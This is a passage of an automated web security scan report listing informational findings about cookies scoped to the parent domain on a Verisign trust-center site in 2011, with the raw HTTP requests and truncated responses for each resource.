Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................            


............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 876
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................        

       .....................(...............................    ...2......................U..........!"6AGu....123q.........?..Y...x.zWG
...[SNIP]...

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/webtrust.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2221
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r    .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f.
...[SNIP]...

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/account_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 741
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user
...[SNIP]...

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/chat_support.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 423
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height
...[SNIP]...

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/default.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2794
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();}
function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d
...[SNIP]...

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:36 GMT
Server: Apache
Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1674
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */

/* Create new OnlineOpini
...[SNIP]...

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/oo_engine_c.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 28368
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/* OnlineOpinion v4.1.7 */
/* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */
var OnlineOpinion=new Ob
...[SNIP]...

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/popup.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:37 GMT
Server: Apache
Set-Cookie: TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 598
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var currentPopupId=null;function hidePopup(){if(currentPopupId){hideElement(currentPopupId);currentPopupId=null;showElementBlock("right_content");showElementBlock("right_content_1");showElementBlock(
...[SNIP]...

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/product_white_list.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:35 GMT
Server: Apache
Set-Cookie: TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var product_white_list=["SS001","SS002","SS0Y3","SS003","GS001","GS002","GS0Y3","HA001","HA002","HA0Y3","GHA001","GHA002","GHA0Y3","ABSST000"];function white_list_product(product){for(var i=0;i<produ
...[SNIP]...

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/quick_signin.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 5155
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var http_request=false;var targetAjaxDiv="unspecified";function callbackFunction(){if(http_request.readyState==4){if(http_request.status==200){var result=http_request.responseText;try{document.getEle
...[SNIP]...

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/script_log.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:34 GMT
Server: Apache
Set-Cookie: TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Last-Modified: Fri, 27 May 2011 21:56:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 1408
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/javascript


var log;function getLogLevel(){if(document.getElementById("script_log")===null){return"none";}else{return document.getElementById("script_log").value;}}
function generateCall(level,message){var url='
...[SNIP]...

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/scripts/src/dojo/dojo/dojo.js HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
